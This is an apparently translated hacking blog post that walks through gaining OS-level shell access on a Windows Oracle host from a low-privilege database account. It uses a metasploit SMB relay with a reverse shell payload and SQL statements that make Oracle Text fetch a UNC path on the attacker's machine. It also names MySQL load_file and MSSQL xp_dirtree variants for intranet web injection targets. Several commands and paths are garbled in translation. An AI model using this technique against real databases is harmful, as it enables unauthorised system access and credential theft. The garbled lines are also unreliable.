Use a low-Permission Oracle database account to obtain OS Access Permissions

I have read a document called "Penetration: from application down to OS (Oracle)" over the past few days. It seems interesting. The general meaning of this document is, if the ORACLE service is started with the administrator account, you only need to have a database account with the resource and connect permissions, you can use metasploit's smbrelay function to build an SMB spoofing server locally, to obtain the system access permissions. I tested it locally and succeeded. :-)

Let's take a look at the detailed principle analysis. Here I will write down my testing process.

My penetration environment uses ubuntu8.10 + metasploit 3.3 dev, the oracle database version is 10.2.0.1.0, the Service Startup permission is administrator, and the database account uses the default permissions of the dbsnmp account.

 

1. Run the netstat command to check whether the local port 139 is occupied. Generally, the service that occupies this port is Samba. disable it. To disable ubuntu, run sudo/etc/init. d/samba stop.

 

2. Run metasploit. The payload I selected is shell_reverse_tcp. After the corresponding configuration is completed, exploit. You can use netstat to see that ports 139 and 8522 have been monitored locally.

 

3. Now I use the default dbsnmp account to connect to the oracle database. This account has low permissions by default and only has the connect and resource permissions.

 

4. then execute the following three SQL statements

SQL> Create table files (id number primary key, path VARCHAR (255) UNIQUE, ot_format VARCHAR (6 ));

SQL> Insert into files VALUES (1, '192. 168.1.52mickey ', NULL );

SQL> Create index file_index ON files (path) indextype is ctxsys. context

2 PARAMETERS ('datastore ctxsys. file_datastore format column ot_format ');

 

When the statement "create index" is executed, check our local metasploit to obtain the half lm hash and mongoshell of the current service user in the ORACLE database host system.

 

 

 



After receiving a prompt from pt007, I tested mysql again. If the service is started by administrator, select load_file('192.168.1.52mk.txt ') to obtain system permissions. MSSQL should use the xp_dirtree stored procedure, but I didn't configure it to use the administrator account to start the MSSQL service. If you want to know it, give me some advice.

This technology can be used to evaluate the Intranet WEB. If there is an injection, the service is started by the administrator, and the permission can be raised.

From www.dis9.com